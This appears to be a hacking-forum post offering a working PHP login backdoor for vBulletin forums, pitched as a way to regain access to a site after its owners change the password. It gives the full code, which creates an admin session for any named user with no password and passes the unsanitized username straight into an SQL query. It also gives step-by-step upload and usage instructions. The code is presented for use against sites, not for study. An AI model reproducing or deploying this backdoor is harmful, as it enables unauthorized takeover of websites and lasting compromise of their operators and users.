Hacked a site, got a shell up?
Two days later they’ve changed the PW and you forgot the shell or some shit?
Here is my autologin
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin Login Backdoor v1.01 by xprog Updated by Biz
|| # ---------------------------------------------------------------- # ||
|| # Place backdoor in root folder of vbulletin.
|| # Will create an admin session if user is an admin.
|| # ---------------------------------------------------------------- # ||
|| # Usage:
|| # biz.php?bd=UserName
|| #
|| #################################################################### ||
\*======================================================================*/
if (isset($_GET['bd']))
{
define('THIS_SCRIPT', 'login');
require_once('./global.php');
require_once('./includes/functions_login.php');
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['bd'] . "'");
if (!$vbulletin->userinfo['userid']) die("Invalid username!");
else
{
vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_GET['bd']);
process_new_login('cplogin', TRUE, TRUE);
do_login_redirect();
}
}
?>
How to use?
Upload file. Let’s say it’s biz.php
Go to:
www.site.com/biz.php?bd=username
wait for it.. done.
What I did in this project:
Prog made it so you can just log into the forum, when you try accessing the admincp, you’ll have to login. I made it so it’s universal =D
Anywho, enjoy.
